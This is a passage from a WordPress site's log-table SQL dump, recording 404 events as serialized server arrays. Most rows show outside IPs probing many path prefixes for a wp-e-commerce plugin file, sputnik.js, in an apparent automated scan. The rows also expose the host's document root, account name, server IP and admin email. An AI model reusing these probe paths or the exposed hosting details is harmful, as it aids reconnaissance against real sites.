HP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571142752.6144\";s:12:\"REQUEST_TIME\";s:10:\"1571142752\";}}','notice','2019-10-15 12:32:35','2019-10-15 12:32:33',35783448,37584232,'https://bintara.com.my/portal/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'159.65.162.186'),(28060,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:95:\"/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:95:\"/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaXBZPs3ai5mz5uo0hUNvwAAAFI\";s:19:\"REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:95:\"/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaXBZPs3ai5mz5uo0hUNvwAAAFI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"164.132.44.97\";s:11:\"REMOTE_PORT\";s:5:\"46468\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:117:\"https://bintara.com.my/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:95:\"/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaXBZPs3ai5mz5uo0hUNvwAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571144036.4702\";s:12:\"REQUEST_TIME\";s:10:\"1571144036\";}}','notice','2019-10-15 12:53:58','2019-10-15 12:53:57',35284408,37081976,'https://bintara.com.my/oldsite/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'164.132.44.97'),(28061,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:91:\"/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:91:\"/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaXBfAVj2IHr1GCPxbXI6wAAAJE\";s:19:\"REDIRECT_SCRIPT_URI\";s:113:\"https://bintara.com.my/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:91:\"/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaXBfAVj2IHr1GCPxbXI6wAAAJE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.74.5\";s:11:\"REMOTE_PORT\";s:5:\"43816\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:113:\"https://bintara.com.my/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:91:\"/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaXBfAVj2IHr1GCPxbXI6wAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571144060.2129\";s:12:\"REQUEST_TIME\";s:10:\"1571144060\";}}','notice','2019-10-15 12:54:21','2019-10-15 12:54:20',35286040,37090096,'https://bintara.com.my/www/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'5.196.74.5'),(28062,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"92.118.209.152\";s:11:\"REMOTE_PORT\";s:5:\"41162\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaXHwQVj2IHr1GCPxbXN2QAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571145665.5207\";s:12:\"REQUEST_TIME\";s:10:\"1571145665\";}}','notice','2019-10-15 13:21:08','2019-10-15 13:21:05',35423216,37224072,'https://bintara.com.my/?page_id=11',1,0,'92.118.209.152'),(28063,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:92:\"/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaXO9QVj2IHr1GCPxbXR-wAAAIo\";s:19:\"REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:92:\"/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaXO9QVj2IHr1GCPxbXR-wAAAIo\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.162.186\";s:11:\"REMOTE_PORT\";s:5:\"60744\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:114:\"https://bintara.com.my/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:92:\"/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaXO9QVj2IHr1GCPxbXR-wAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571147509.8024\";s:12:\"REQUEST_TIME\";s:10:\"1571147509\";}}','notice','2019-10-15 13:51:52','2019-10-15 13:51:50',35681528,37479488,'https://bintara.com.my/blog/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'159.65.162.186'),(28064,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:93:\"/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:115:\"https://bintara.com.my/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:93:\"/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaXe6MfZ2cts0qpaNF@VzQAAAAg\";s:19:\"REDIRECT_SCRIPT_URI\";s:115:\"https://bintara.com.my/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:93:\"/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaXe6MfZ2cts0qpaNF@VzQAAAAg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"39298\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:115:\"https://bintara.com.my/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:93:\"/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaXe6MfZ2cts0qpaNF@VzQAAAAg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571151593.11\";s:12:\"REQUEST_TIME\";s:10:\"1571151593\";}}','notice','2019-10-15 14:59:57','2019-10-15 14:59:53',35779472,37578664,'https://bintara.com.my/store/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'51.255.43.81'),(28065,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:87:\"/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:109:\"https://bintara.com.my/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:87:\"/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaXiJwVj2IHr1GCPxbXZ2gAAAIs\";s:19:\"REDIRECT_SCRIPT_URI\";s:109:\"https://bintara.com.my/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:87:\"/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaXiJwVj2IHr1GCPxbXZ2gAAAIs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"47001\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:109:\"https://bintara.com.my/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:87:\"/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaXiJwVj2IHr1GCPxbXZ2gAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571152423.5612\";s:12:\"REQUEST_TIME\";s:10:\"1571152423\";}}','notice','2019-10-15 15:13:46','2019-10-15 15:13:44',35679872,37475032,'https://bintara.com.my/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'5.135.143.224'),(28066,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:92:\"/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:92:\"/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaXrzMfZ2cts0qpaNF@doAAAAAA\";s:19:\"REDIRECT_SCRIPT_URI\";s:114:\"https://bintara.com.my/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:92:\"/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaXrzMfZ2cts0qpaNF@doAAAAAA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"196.47.64.42\";s:11:\"REMOTE_PORT\";s:5:\"55892\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:114:\"https://bintara.com.my/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:92:\"/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaXrzMfZ2cts0qpaNF@doAAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571154892.171\";s:12:\"REQUEST_TIME\";s:10:\"1571154892\";}}','notice','2019-10-15 15:54:55','2019-10-15 15:54:52',35677984,37481688,'https://bintara.com.my/2018/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'196.47.64.42'),(28067,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:91:\"/old/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 